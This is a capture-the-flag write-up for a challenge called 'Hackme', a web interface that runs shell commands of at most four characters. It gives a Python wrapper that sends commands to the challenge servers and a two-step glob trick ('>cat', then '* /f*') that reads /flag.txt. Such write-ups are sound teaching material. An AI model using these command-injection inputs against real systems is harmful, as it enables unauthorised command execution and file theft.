Rating:

# Hackme
We were given the challenge text:
```
can you please just hack me, I will execute all your commands but only 4 chars in length

EU instance

US instance

author: pop_eax
```

I personally would say that this is closer to a misc challenge than a web, but it was still fun! The website was pretty much just a web interface for a shell, so I made a (way too advanced) Python script to interact with it.
```py
import requests

servers = {
'eu': 'http://207.180.200.166:8000/',
'us': 'http://45.134.3.200:8000/'
}

server = input(f'EU or US?\n> ').lower()

url = servers[server]

while True:
cmd = input('$ ')

if cmd == 'reset':
res = requests.get(f'{url}/?reset=1').text
elif cmd == 'q':
quit()
else:
res = requests.get(f'{url}/?cmd={cmd}').text
print(res)
```

Our goal was to view the contents of the flag in `/flag.txt`. In typical me style, I overcomplicated everything. I spent probably a day trying to craft an exploit that allowed me to curl my own server for a file containg `cat /flag.txt`, but of course curl didn't work, and I had to try again. A lot of my earlier testing included `*`, so I had done some researching on how exactly it works. After a bit of thinking, I realized I could create a file titled `cat`, and if it was the only file in the directory I could simply type `*`, and it would be replaced by `cat`. The final solution was a simple 2 lines: `>cat` (creates the file) and `* /f*` (cats /flag.txt). The result was `flag{[email protected]_5pl1t_Em3012}`.

Original writeup (https://github.com/WastefulNick/CTF-Writeups/tree/master/0x41414141/web/hackme).